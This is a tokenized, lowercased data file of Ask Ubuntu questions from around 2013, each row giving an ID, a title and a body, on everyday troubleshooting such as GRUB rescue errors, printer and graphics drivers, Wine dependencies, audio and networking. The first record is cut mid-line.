//os.cgs.wustl.edu/ubuntu/ precise/main amd64 packages $ sudo apt-cache policy mysql-client mysql-client : installed : 5.5.29-0ubuntu0.12.04.2 candidate : 5.5.29-0ubuntu0.12.04.2 version table : *** 5.5.29-0ubuntu0.12.04.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 5.5.29-0ubuntu0.12.04.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 5.5.24-0ubuntu0.12.04.1 0 500 http : //os.cgs.wustl.edu/ubuntu/ precise-updates/main amd64 packages 500 http : //os.cgs.wustl.edu/ubuntu/ precise-security/main amd64 packages 5.5.22-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 500 http : //os.cgs.wustl.edu/ubuntu/ precise/main amd64 packages
274510	what does mean // directory ?	i was working in my terminal , and than i misspelled when cd to root / accidentally i typed // and i got that in terminal as : root @ weblocalhost : // # when i type pwd , i get response // but when i type ls -s i got same list as in / directory . when you type more than 2 , i.e . /// you get : root @ weblocalhost : / # always as 1 / except for 2. is there any difference and what is for // ? ? ?
274514	how to enable sound after kernel update on xmbc with cmedia-8783	after the last apt-get upgrade the sound-settings on my xmbc-server are gone again . i fiddled a lot to adjust the sound-settings so they work with spdif-out and dts but now i am lost again . there are so many options in alsa-mixer and i guess only one configuration works ; (
274520	cd based usage of debootstrap ?	i have installed 12.04 xubuntu alternative with whole disk encryption on a machine . i am attempting to set up a schroot usage of backbox 3.01 ( an ubuntu 12.04 derivative from what i can tell ) under that installation . when i run debootstrap to install the backbox from the backbox install cd as in : sudo debootstrap -- verbose -- arch=amd64 precise /srv/chroot/backbox file : //mnt/backbox ... ( cd path ) i get : i : retrieving release e : failed getting release file file : //media ... /dist/precise/release the path displayed in the error message i trace to a file that is `` release '' and has the release manifest in it , so i am assuming it looks like the target file . i have tried moving the cd contents local and chmod the files to be 777 to make sure there was not some access issue , but still is having the same issue . i have checked to make sure there is no path globbing , or other issue as well . so a couple of questions . how do i get debootstrap to work with a cd based installation ? if ( 1 ) is not viable , then does anyone know of a online repo i could point debootstap to for backbox ( http : // )
274522	why do i get unknown printer error 0xfa on my epson workforce wf-3540 under ubuntu 12.10 ?	i recently bought an epson workforce wf-3540 , which i 'm using under ubuntu 12.10 with the official driver provided by epson . i am often printing batches of about a hundred pages , duplex . when i 'm doing this , after about 20 pages , i regularly get an error message on the printer screen , telling me the printer encountered unknown error 0xfa , forcing me to turn the printer off and back on . i talked to epson about the problem , but they claim they 're not supporting linux and tell me to ask the linux community about the problem ( and possibly another driver ? ) . so this is what i 'm doing here ... any ideas ? unfortunately , the documentation does not contain any information pertaining to error code 0xfa and the support hotline was n't able to give me further information , either . btw , the problem has n't happened , so far , when i 'm printing smaller batches or not using duplex . whenever the problem happens , there 's a page in the printer that 's already been printed on one side , so i 'm suspecting the problem 's connected with the duplexer .
274524	how can i set up poclbm ( a bitcoin miner ) ?	i 'm trying to set up poclbm on my 12.10 machine . my graphics card ( as stated in system settings ) is an 'intel速 965gm x86/mmx/sse2 ' . i am trying to use the guide here but python-pyopencl ca n't be installed - the following packages have unmet dependencies . python-pyopencl : depends : opencl-icd but it is not installable depends : python-pyopencl-headers ( = 2012.1-1ubuntu1 ) but it is not going to be installed recommends : python-pyopencl-doc but it is not going to be installed recommends : python-opengl but it is not going to be installed e : unable to correct problems , you have held broken packages . has anyone got any ideas on how to fix this ? thanks in advance , microbug
274526	would installing ubuntu only remove everything i have on my computer ?	would installing ubuntu 12.10 only and not alongside windows 8 remove everything i have ? i do n't want anything i had before to stay on my computer so i want to start fresh .
274531	why chinese for my uploads ?	did n't use to happen . now happens with any upload of csv data , regardless of content ( and it is n't chinese ! ) . i checked cat /etc/default/locale lang= '' en_us.utf-8 '' my language settings are all english
274532	dragging files onto sublime ( or any custom program ) in unity	a while ago , i followed tutorial which told me how to `` install '' sublime so that it behaved like a standard program , with a unity icon i could lock on the launcher . i also set sublime so that it was the default application to open text files . there is still one thing that it does not do . if i drag a file from nautilus onto the launcher , all the apps fade away , but the ones which can open it do not ( gedit does not fade away ) . i can then drop the file onto an application which can handle it and that application with open it . this does not happen for sublime , how do i configure this to happen ?
274539	issue with the update manager	whenever i check for updates in the update manager i get a message saying that there is an issue with my internet connection and that it needs to be checked . additionally under details , this is the message that 's there- w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . issue is , that despite this message , i get a number of updates , that i install , and after that is done , there 's a message at the top of the update manager saying that the package details are 'x ' days old . currently x=70
274540	ca n't compile with gcc on ubuntu 12.04	i 'm trying to compile and run the below c program on my ubuntu & windows machines with both gcc & vc9 . however , i 'm facing below issues : on ubuntu machine : gcc compiles fine , but when run , i 'm shown this prompt : segmentation fault ( core dump ) . on windows machine : vc9 compiles & runs fine . gcc compiles fine , but process terminates when program is run . need your expert assistance here . here is my code : # include < string.h > # include < stdio.h > int calc_slope ( int input1 , int input2 ) { int sum=0 ; int start=input1 ; int end=input2 ; int curr=start ; //some validation : if ( input1 > input2 ) return -1 ; while ( curr < =end ) { if ( curr > 100 ) { char *s= '' '' ; int length ; int left ; int right ; int cent ; sprintf ( s , '' % d '' , curr ) ; length=strlen ( s ) ; s++ ; do { //printf ( `` curr= % d char= % c pointer= % d length= % d \n '' , curr , *s , s , length ) ; left = * ( s-1 ) - '0 ' ; cent = *s - '0 ' ; right = * ( s+1 ) - '0 ' ; //printf ( `` curr= % d l= % d c= % d r= % d\n '' , curr , left , cent , right ) ; if ( ( cent > left & & cent > right ) || ( cent < left & & cent < right ) ) { sum+=1 ; //we have either a maxima or a minima. } s++ ; } while ( * ( s+1 ) ! ='\0 ' ) ; } curr++ ; } return sum ; } int main ( ) { printf ( `` % d '' , calc_slope ( 1,150 ) ) ; return 0 ; } update : credit goes to eliah for not only helping me track the error , but also introducing me to gdb and its back-tracing tool ( bt ) which are so helpful in debugging a gcc compiled program . here is the modified version , i worked up after some trial and error : # include < string.h > # include < stdio.h > # include < stdlib.h > int calc_slope ( int input1 , int input2 ) { int sum=0 ; int start=input1 ; int end=input2 ; int curr=start ; //some validation : if ( input1 > input2 ) return -1 ; while ( curr < =end ) { if ( curr > 100 ) { int size=10 ; char *s= ( char* ) malloc ( ( size+1 ) * sizeof ( char ) ) ; int left ; int right ; int cent ; sprintf ( s , '' % d '' , curr ) ; s++ ; do { left = * ( s-1 ) - '0 ' ; cent = *s - '0 ' ; right = * ( s+1 ) - '0 ' ; if ( ( cent > left & & cent > right ) || ( cent < left & & cent < right ) ) { sum+=1 ; //we have either a maxima or a minima. } s++ ; } while ( * ( s+1 ) ! ='\0 ' ) ; } curr++ ; } return sum ; } int main ( ) { printf ( `` % d '' , calc_slope ( 1,150 ) ) ; return 0 ; }
274541	one ssid , two routers . how can i force the connection to the correct mac ?	basically , the header tells it all . i have two routers configured with the same ssid . the main router is upstairs , and the secondary router is downstairs . where i work , normally , the portable sees both routers with about the same strength . but the secondary router is not good for me ( too much lost packages , etc . ) is there a way to assign a name ( upstairs/downstairs ) to the mac address of each router ?
274549	3 monitors with ati card	so i wanted to go back to linux ( ubuntu ) after been using windows for a while and went ahead and installed ubuntu . the problem that i got was i couldn’t use it the way i wanted , i have a 3 monitor setup and the left and right monitor is in portrait mode , and for some reason that didn’t work on ubuntu , what i got was two monitors not showing anything when going in to display settings and changed them to portrait , i tried installing the ati catalyst and tired all the additional drivers that i could choose from , but that didn’t solve the problem . so i had to go back to windows . anyone knows how to make this work so i might give it another go . i’m using an ati hd7850 card .
274556	using fglrx after using vesa driver issues	i 've been using vesa driver for old radeon x1950 . after i removed the card ( using integrated hd 400 now ) , installed fglrx and applied correct xorg.conf x is up and running and i can see `` log in '' screen . i can login as guest ( create new users ) , but when i log in my original user i 'm getting kicked back to `` log in '' screen . in xorg.0.log i can see a couple of warning but no errors : [ 104.483 ] ( ww ) falling back to old probe method for fglrx [ 104.488 ] ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 0:17:0 ) found are their some driver-specific files somewhere in ~/.config/ ?
274557	update manager asking me to update kernel but apt-get upgrade does not ?	just what the title says . the update manager is also asking me to update to ubuntu 12.10 even when i have the part unchecked that says `` check for new ubuntu version updates '' thing . is there some way to turn the annoying update manager off ?
274564	lock hard drive partition using ubuntu password	i want to use my ubuntu password , to lock a hard partition with it can i ? ! use my password so no one else can acess type of partition
274569	music play which can convert audio	is there any player using which i can play and ( or ) convert music ? i mean something like foobar2000 for windows .
274570	just installed ubuntu , i have a usb wifi stick but can not find a way of connecting ?	i 'm running a dell vostro 200 , with a net gear wifi stick , i can not find a menu that shows me wireless networks , just wired which is greyed out because i have no wires and no way of connecting via a wire . please help !
274571	equalizer to cut specific frequencies on microphone input	does ubuntu have a utility which can adjust levels for specific input sound frequencies ? we are doing video conferencing and one of our co-workers has a lot of unavoidable ambient noise . he would like to isolate particular frequencies coming from his microphone and cut them before they are passed to the video conferencing software . i checked out pulseaudio equalizer , but it seems to be limited to sound output , not input .
274573	external display issues lenovo w530 ubuntu 12.10 , vga not recognized	i am running a lenovo w530 with ubuntu 12.10 . i have tried every solution i could find for this issue but to no avail . ubuntu will not recognize that i have a vga monitor connected to the laptop . i realize that the vga connector goes through the nvidia driver . what i have tried ( would provide more links but i need my rep needs to be greater than 10 to post more than two ) : the steps lined out by jim what applied to my system from sagark trying to force the driver to be on with bbswitch changing the bios so that it would run in discrete ( it will boot but i get horrible resolution and still no external display ... also seems that compwiz does not work well while in this mode went through a couple of additional threads about getting a virtual display . however , every time i try to install the patch that was hacked for the intel driver for the virtual display capabilities , my intel display crashes and i have to revert . virtualization is enabled for my intel display in the bios i have hit a wall . i have also read through about 10 different questions on here and none have helped . should i completely scrap the nvidia drivers on my machine and run only with bumblebee ? has there been any success with that ? any assistance would be greatly appreciated . edit : kernel : 3.5.0-26-generic
274574	`` error : no such device ... < grub rescue > '' i 'm clueless	first off , i have no idea what i 've done or am doing , so any help offered ( which will be greatly appreciated ) will have to be spelled out in great detail so i can understand what i need to do . i 've been using a computer lent to me by my friend and i was hoping to use an external hard drive i have to run ubuntu ( 12.04 ) so i could have a more personalized space without putting his machine at any kind of risk . but now whenever i turn on the computer i get this message : `` error : no such device : cb105e2b-b911-4e52-9dc6-504560332258e . grub rescue > '' regardless of which os i 'm trying to load ( the ubuntu from the external hd or the windows 7 from the internal ) . i know there are plenty of questions on the same matter , but as i 've stated i do n't really know what i 'm doing , so if i misunderstood what aspects of the answers were applicable to my situation , i could probably really mess something up , and i 'd really rather not . i do n't know what details to include , sorry .
274576	is it possible that leap motion controller will work with ubuntu ?	i skimmed through https : //forums.leapmotion.com/forumdisplay.php ? 7-linux and did n't find any precise answer . is there one ? does it use closed data format ? does it prohibit reverse engineering in some eula ?
274582	printing stackexchange pages with firefox is slow on ubuntu , but not on windows ; why ?	printing from stackexchange is very slow from ubuntu , but normal from windows ; why ? has anyone else noticed this before ? first , i tried printing via firefox , i also tried printing to pdf , and then physically printing the pdf both were so slow that i aborted . i tried to print various q & a 's ; one worked , but it also took a very long time .
274583	ubuntu wo n't connect to ethernet network that does n't provide internet access	when i try to connect to a network with an ethernet cable into my computer , and the network wo n't provide internet access ( it is n't supposed to provide internet access , only local access ) , ubuntu will fail to connect to it . it will connect if the network provides internet , but wo n't connect when the network does n't provide internet . i am using ubuntu 12.10 . if it makes any difference the network i am trying to connect to is for an frc robot . but i know that is n't the problem because i successfully connected from another computer using windoze .
274584	how to configure ubuntu to accept magick packets ?	how to configure a machine with ubuntu 12.04 lts to accept magick packets ? i 've already set at the setup the option to accept the boot from the network . i tried to install ethtool too , but i could't go ahead . what 's the next step ? sudo ethtool wlan0 returns : settings for wlan0 : link detected : yes could this hold with wireless connections ? =/ maybe not ...
274591	how do i restart conky and nautilus whenever they crash ?	many times nautilus crashes because of various reasons . when nautilus crash , it crashes with conky . the only way to get back conky and active desktop is to start nautilus and conky from terminal . how can i make nautilus and conky re-start automatically whenever a crash occurs ? some peoples are advising to use upstart . but the upstart cook-book is too heavy for me , as im a windows user and im not accustomed of cli/.conf things . if anyone can give me exactly what i need to change then it would be a great help . in the mean while i will do try to figure out how to make things work using upstart daemon .
274592	how to boot livecd from grub shell	i had dualboot on my netbook acer aspire one p531h - ubuntu and windows xp . ubuntu was there just for a temporary work so i needed to remove the partition today . i have used ms-sys from ubuntu so i would n't need to restore mbr with windows xp installation disc , then i booted into xp and assigned the free space to the rest of the os . the computer rebooted and now i am stuck in menu where i can choose to boot xp where i get a message that it could not be started and if i want to use safe mode ( any option leads to bluescreen and reboot ) and the other option is ubuntu and there is grub shell loaded with some basic commands ( it says it does not even now cd or find ) . ok i know it is n't good so i have tried to insert ubuntu livecd to the external drive . it did n't react so i wanted to change the bios setting to boot from cd but when the system is starting and i press f2 there is a black screen for the moment and then i am back at the screen where i can choose between xp and ubuntu . now i am desperate is there any help ? thanks
274594	http_proxy variable	i was following this guide to install redmine on my server : http : //www.redmine.org/projects/redmine/wiki/howto_install_redmine_in_ubuntu it written there : run the following commands to export your proxy settings for both http ( port 80 ) and https ( port 443 ) : export http_proxy= '' http : //proxy.your.server : port '' export https_proxy= '' http : proxy.your.server : port '' so i did ... and now i ca n't install things , for example : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/universe/g/gems/gems_1.1.1-1_amd64.deb 404 not found but if i insert the url address to my browser - i do get the file . not sure there is connection between the two things . i would like to know what was my http_proxy before i changed it .
274596	google says sorry in ubuntu 12.10	i have just installed ubuntu 12.10 and when i attempt to search google i receive the following error message : we 're sorry ... ... but your computer or network may be sending automated queries . to protect our users , we ca n't process your request right now .
274597	how do i get a byobu session with a command to run on startup ?	i am trying to get byobu to startup with ubuntu server 12.04 when the server starts up . i 've figured out how to do this with a screen session but i want it to be in byobu with all the added features , not in screen . in start ( ) within an init.d script for screen this is the line that works ( after changing the environment to the correct user via su - $ user -c `` $ user_init ; $ 1 '' > /dev/null & & return 0 -- - user and user_init are both populated properly , tested working via screen ) : screen -u -s $ sessionname -d -t $ wcapp -m $ wcapp replacing screen with byobu or byobu-screen does not work . i have the back-end set to screen . i do not want to edit the /.byobu/windows file as that does not launch until a user manually starts a byobu back-end . the $ sessionname i am using is weechat and the $ wcapp variable is weechat-curses , i have no quarrels about using the literal value instead of passing variables . thank you .
274598	how can i share the ubuntu screen to mac ?	i 'd like to know how can i share my ubuntu 12.04 lts screen with a mac os x 10.8.2 machine . is there a easy way to do this ?
274603	trying to install cpan	trying to use cpan but i am running into an issue . first i did sudo apt-get install perl . it says it 's there . typed cpan install automatically yes sudo which indicated as done and i can get into cpan . downloaded the .pl i wanted to use on cpan . pointed to the directory and tried perl file.pl . i am presented with message ca n't locate cam/odf.pm in @ inc ( @ inc containes /etc/per/ /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14/ .usr/share/perl/5.14 /usr/local/lib/site_perl . ) at file.pl in line 7 i downloaded cam-pdf-1.59.tar.gz double clicked and tried placing the contents in /usr/local/lib/pkgconfig but i am getting you do n't have the right permissions . how should i install cpan in ubuntu 12.10 to use in the terminal ? where am i going wrong ? please educate me !
274607	how do i install a livebox usb printer as network printer ?	i hope someone has figured this out because i 've spent days with google trying to track down the solution . i got fed up with microsoft win xp and 7 and decided to try ubuntu 12.04 on a spare laptop ( dell e6400 ) . everything was going fine - i got it connected to my livebox router using wifi , i could see and access the external hard drive connected to the livebox usb and i could connect a canon pixma ip5000 usb printer locally to the computer . the wheels came off when i tried to connect ubuntu 12.04 lts computer to the printer ( canon pixma ip5000 ) which is now connected to the usb on the livebox . i have not had any problems connecting to this networked printer using a win xp machine over the wifi . i tried 3 ways to use the add printer over the network using the tool in ubuntu 12.04 lts : find network printer i searched for the printer ( 192.168.1.1 - the livebox ip address ) and the tool quickly found `` my gateway printer '' which it connected as ipp : //192.168.1.1:631/printers/gateway-usb-printer . i used the driver finder to install canon pixma ip5000-cups+gutenprint v5.2.8-pre1 . this is the same driver that works when the printer is attached to the computer via usb connection . when i tried to print a test page , i get an indication idle - printing page 1 , 20 % i investigated using cups tool in firefox . the cups 1.5.3 tool shows an error message : aborted unable to add document to print job . app socket/hp jet direct i entered host 192.168.1.1 port 9100 . the tool sets up a connection socket : /192.168.1.1:9100 and uses the same print driver in ( 1 ) above . when i print a test page , i get a message processing - the printer is busy . nothing ever happens . windows printer via samba the tool creates a connection `` smb : ///192.168.1.1 % 3a631 '' and i again use the same printer driver in ( 1 ) above . when i print a test page , i get a message processing - unable to connect to cifs host , will retry in 60 seconds . the cups tool indicates connection failed : nt_status_bad_network_name . can someone help me figure out what is going wrong here ? i 'd love to get this printer working over the network as the the basis of my project is to create ubuntu driven laptop that i can use to print and share files with my other computers over the livebox wifi network . i 'd appreciate specific instructions to get the printer ( connected by usb to a livebox wifi router ) to connect over the wifi network to my laptop . thanks !
274614	dual boot win7 ubuntu 12.10 use 2nd hdd for all my docs	my current setup is that i have : 1tb hdd split with windows os and ubuntu os ( with system and swap of course ) 2tb hdd for all my docs what i want to be able to do is whether i am in windows or ubuntu be able to use the 2tb hdd to access all my docs . i have tried this : https : //help.ubuntu.com/community/partitioning/home/moving but as the second drive is formatted to ntfs it changes the owner of my home directory to root and i can not chown it to me . even if i use gksude nautilus and try it in a gui , as soon as i select my user name as group : owner it changes back to root straight away . this also knock out pulseaudio as it says it is not owned by me . then i tried http : //www.howtogeek.com/howto/35807/how-to-harmonize-your-dual-boot-setup-for-windows-and-ubuntu/ but this is flawed as then your home directory with all my documents ( music , video etc ) is not accessible through a terminal command ~/music . has anyone been able to do this successfully ? the best thing would be if i could get thatfirst link to not change my home directory to be owned by root . then i can just realign the libraries in windows .
274618	configuring a 7.1 surround sound usb headset ?	i recently purchased g35 surround sound headset from logitech . i would like to enable 7.1 surround sound for it , but have n't been able to find a method that works . it works correctly under windows 7 on the same machine , so i 'm guessing there 's a software setting somewhere i 'm missing . oddly , all sound only goes the left speaker at the moment as well . ( it 's back to stereo now ... i do n't think i changed anything . ) so , what am i missing ?
274623	`` jetty is not installed '' on boot , and poweroff	every time i boot , or poweroff ( without quiet and splash params ) i get a red massage saying `` jetty is not installed '' . what is jetty , and why am i getting this ?
274626	sony handicam can`t download to shotwell	i`m trying to download videos from my older ( mini tape ) storage camcorder using a usb cable.connected to my laptop , running latest version ubuntu . i thank anyone who helps ahead of time . thanks .
274628	how to download ubuntu over an unreliable connection	i am trying to download the 64-bit ubuntu 12.10 iso over an extremely unreliable connection . by unreliable , i mean that every time i finish downloading the iso and compare the md5 hashes , i end up with an error about a mismatch . i am using ubuntu 12.04 to perform the download . is there a tool that can somehow work around a very unreliable connection ?
274630	need to expand /boot partition but not sure if i can	so i 've been having some trouble installing updates lately because my boot partition has run out of space . i did some research to try and find the best way to expand the partition , but after looking at gparted , i 'm not sure if it 's possible for me to do it without reformatting everything . since i ca n't post pictures here 's a little description of what i 've got going on on /dev/sda : partition - file system - mount point - size - used - flags /dev/sda1 -- -- -- ext4 -- -- -- -- -- -- -- /boot -- -- -- -- -94mb - 94mb - boot /dev/sda2 -- -extended -- -- -- -- -- -- -- -- -- -- -- 465.67gb /dev/sda5 -- -- -ext4 -- -- -- -- -- -- /home -- -- 465.67gb - 66gb - unallocated-1.02mb just as an aside , my / partition is installed on the ssd portion of the hybrid drive . any comments/suggestions would be greatly appreciated .
274632	how to prevent cpu governor from changing automatically on laptop power ?	i noticed when i plug-in or unplug my laptop 's ac adapter , the cpu scaling governor changes to ondemand . because my laptop gets fairly hot , and i do nothing intensive on it , i prefer powersave at all times ... and it helps keep my lap cool . is there a way to prevent xubuntu from automatically changing it to ondemand when i plug/unplug the ac adapter ? i 'm using xubuntu 12.10 if that 's relevant .
274643	using alias to change ls to ls-l changes ( or disables ) the colors of ls output	i 've used alias to change ls to ls -l , but the colours change to the normal font of the terminal ( also tried ls -l before the alias command and the colours appeared fine ) . what is wrong ? thank you
274646	grub rescue - how get rid of it ?	i seem to have a rare problem . i had ubuntu 12.10 installed , and uninstalled it ( i wanted to boot several distros ) . now my vaio boots just fine to windows 7 . however , when i press f11 to install something from my dvd ( other distros ) , i get `` grub rescue > '' and `` disk does not exist '' and a long number . i have tried a number of ways to get rid of the grub remainder that exist somewhere , but have not managed . i even have created a boot-repair disk following instructions here , but since i can not boot from anything other than window7 , that does n't work . and i can not - of course - boot from my windows 7 image in a different partition and do a mbr repair either . so i seem to be stuck . i have installed partion software , but i do n't want to just delete partitions blindly hoping to get rid of grub ( grub2 , i guess ) either . so what do i do ? do anybody have any experience with this kind of situation ?
274649	can i create a new script and chmod it in one command ?	when writing answers on here , it 's often necessary to create a new script and chmod +x it to make it executable . i wo n't go into whether this is a good thing or not , but explaining to people that they need to fire in three separate command ( and teaching them to use nano ! ) is a bit of a waffle . is there anything easier ?
274657	ubuntu stops at nouveau during boot up ( live or install )	i have used linux in the past , but am still a casual user . i recently upgraded laptops to a dell m6600 . it has a i7-3840qm at 2.8ghz and 32gb of ram . it has both an intel hd 4000 on board graphics chip and a dedicated nvidia quadro k4000m card with 4gb of video memory . when i try to boot a live usb or install and try to boot the install i get hung up at : [ drm ] nouveau 0000:01:00.0 : 0x912b : condition still not met after 800ms , skipping following opcodes [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 5 at offset 0xb5da [ drm ] nouveau 0000:01:00.0 : parsing vbios init table at offset 0x63f [ ttm ] zone kernel : available graphics memory : 16409182 kib [ ttm ] zone dma32 : available graphics memory : 2097152 kib [ ttm ] initializing pool allocator [ ttm ] initializing dma pool allocator [ drm ] nouveau 0000:01:00.0 : detected -344145920mib vram ( gddr5 ) mtrr : type mismatch for e0000000,10000000 old : write-back new : write-combining [ drm ] nouveau 0000:01:00.0 : 512 mib gart ( aperature ) and i never get past that point . any thoughts ?
275658	is there a dnsmasq 's `` address=/ '' equvilent in isc-dhcp-server ?	i previously had ubuntu 12.04 x64 running dnsmasq & tftpd-hpa & nfs for pxe boot i currently have ubuntu 12.10 x64 running isc-dhcp-server & tftpd-hpa & nfs for pxe boot ( from a clean install and everything is running satisfactory ) before with my dnsmasq setup , i had these lines in /etc/dnsmasq.conf address=/local.home/192.168.1.50 address=/some.other.domain.name/192.168.1.50 i am hoping that i can be helped setting this ability on my new install . i tried using option domain-name option domain-name-server with my new setup but it would not work though . is the only way to install bind9 and setup everything ? i tried looking at tutorials but could not find anything to help me . what this allowed me to do was when i loaded up a live image from any box booting off the pxe and entered this address into a browser , it would show my local-only-website . what this also allowed me to do was when i install a custom os that fetched files from some.webserver.com during the installation , my pxe server ( which is usually disconnected from www ) would redirect it to my local-only-website and grab it locally ( which i have a copy of all the files required ) i tried setting up bind9 however since my pxe-server is usually connected to local network only , i am at a lost at what to input when all the tutorials tell me to put in my isp 's dns address . if someone can help that would be great !
275661	how do you make a program that does n't need to be installed searchable in the unity dash . ( ubuntu 12.10 )	i 've come across this a few times , but i will use a specific example . when i downloaded the adt bundle from google it came with programs that just ran without needing to be installed , i.e . i can run eclipse just by clicking on the eclipse file after i extracted the archived folders to the /home/adt bundle directory . there was no need to install anything . the problem is that i like using the unity dash to quickly search for the programs i want to run and eclipse does n't show up . in fact , i ca n't even search for the eclipse file located in the /home/user-name/adt bundle/eclipse directory using the dash to start the program that way . what i 'm hoping to learn is how to let the dash know that these folders , files , and/or programs exist on my system so that i can search for them if that is possible . what i 've tried : used sudo nautilus to move the folders containing the programs to the /usr/local directory ( returned it to the /home directory when this did n't work ) additional information : the dash will not find the folder adt bundle located in the /home directory or any file/folder contained within running ubuntu 12.10 i installed my home , root , etc as separate logical partitions ( do n't know if that helps )
275662	`` missing operating system '' - dual boot , 12.10 on macbookpro4,1	i followed these instructions for installing ubuntu dual-boot with osx lion , but when i finished and restarted it said `` missing operating system '' . i restarted a few more times and i got the same message . do i need to install 12.10 in a different way ? at least i did n't mess up the osx partition .
275663	java installed , command not working	i have installed java but i could not get any java command to work ! below shows what i get when i try to run java commands : sultan @ ubuntu : ~ $ java the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install < selected package > sultan @ ubuntu : ~ $ sudo apt-get install openjdk-7-jre [ sudo ] password for sultan : reading package lists ... done building dependency tree reading state information ... done openjdk-7-jre is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
275664	how to automatically connect to home wireless network after waking from a suspension ?	so after some research , i 've found that it 's supposed to disconnect from wifi when it 's suspended , however what i ca n't seem to figure out , is why my laptop is automatically connecting to some other network instead of my own when it comes back on after being suspended . i 've already had a look at the network settings , and the home network is set to connect automatically , the only thing i can see of why it might be choosing this other available network over my home network , is that this other one is not password protected . any ideas ?
275665	wine 1.5 unable to correct problems , you have held broken packages	when i run sudo apt-get wine1.5 i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.26-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : fonts-droid but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . echo `` foreign-architecture i386 '' | sudo tee /etc/dpkg/dpkg.cfg.d/multiarch sudo chmod 644 /etc/dpkg/dpkg.cfg.d/multiarch same error . sudo aptitude install wine1.5 gettext : i386- the output is different then the first time because it was already run . could n't find any package whose name or description matched `` gettext : i386 '' could n't find any package whose name or description matched `` gettext : i386 '' the following new packages will be installed : libcapi20-3 { a } libmpg123-0 { a } libodbc1 { a } libopenal-data { a } libopenal1 { a } libosmesa6 { a } libtiff4 { a } odbcinst { a } odbcinst1debian2 { a } unixodbc { a } wine-gecko1.9 { a } wine-mono0.0.8 { a } wine1.5 { b } wine1.5-amd64 { a } the following packages are recommended but will not be installed : fonts-droid fonts-horai-umefont fonts-unfonts-core gnome-exe-thumbnailer kde-runtime ttf-mscorefonts-installer winbind winetricks 0 packages upgraded , 14 newly installed , 0 to remove and 2 not upgraded . need to get 92.2 mb of archives . after unpacking 196 mb will be used . the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.26-0ubuntu1 ) which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) wine1.5 [ not installed ] 2 ) wine1.5-amd64 [ not installed ] leave the following dependencies unresolved : 3 ) wine-mono0.0.8 recommends wine1.5 4 ) wine-gecko1.9 recommends wine1.5-amd64 accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used .
275667	virtual directory to ubuntu on windows ?	is it possible to create a virtual directory in windows that links to a directory on an ubuntu 12.10 server ? if so , how ? i 'd like to do it this way because it slows me down to constantly save & upload via ftp . i 'm trying to develop a websocket++ server .
275669	what is the difference between `` spread all windows '' and `` window spread '' in unity-tweak-tool ?	i have unity tweak tool v0.03 installed and it shows the options `` spread all windows '' and `` window spread '' in the hotcorners section as different actions . what is supposed to be the difference between these two options ? for what i can tell , they do the exact same thing .
275675	proper install nvidia drivers	i have a problem and i want to get rid of it . i have a evga 480 gtx graphic card and i ca n't install the proprietary drivers . i tried lots of distro , its everytime the same problem : tty console or poor graphics ( no shadow , no mice , i can just open a term via ctrl+alt+t ) i need nvidia propietary drivers : < could you tell me a proper way to install nvidia drivers ? thank you , johnny
275676	why does my computer only boot into windows xp ?	i installed ubuntu from a usb , but when i rebooted my computer after the installer finished , my computer booted into windows xp . i did n't see any menu for selecting the operating system during boot . how do i boot into ubuntu ?
275677	no application is currently recording audio ubuntu 12.04 ( answered )	the matter is that , when i go to pulse audio volume control in attempt to fix skype microphone , it tells me that there is no application is currently recording audio . does anybody have an idea how i can validate skype for it becomes allowed to record ? after following the answer to this question ubuntu 12.10 skype webcam microphone not working with installing pavucontrol i managed to see something trying to record but there is still no sound at all from skype .
275683	qt quick 2.0 ui application not displaying on touch device	i 'm trying to run a tiny ( very tiny ) qt quick 2.0 ui application on my ubuntu touch device ( galaxy nexus phone ) . qt creator successfully pushes to the device ( copies via adb and runs qmlscene ) but i 'm not seeing the application on the device ... . that is until i open another application and then close it . during the app closing animation i am able to see my application ( for a brief second ) until the ubuntu touch main chooser application comes up . is there a special way to switch to my application ? normal swipe from the right does n't put my application into view . my device is running the march 28th build . thanks !
275684	transmission causes internet to stop working	iâm getting the same problem has anyone fixed this . running ubuntu 12.10 and same thing as above . start computer internet works fine . start bittorent client then connection goes south after 5 to 10 minutes . i have a netgear n300 . was running windows with it no problem . windows got a virus no surprise there . so i changed over to ubuntu 12.10 . got the n300 to work , got the audio to work now cant seem to get the connection i need . i tried changing the peers , upload and downloads speed . when i changed the peers to 5 it seemed to work a little longer but in the end i still had to unplug the stick and plug back in . any ideas ? ?
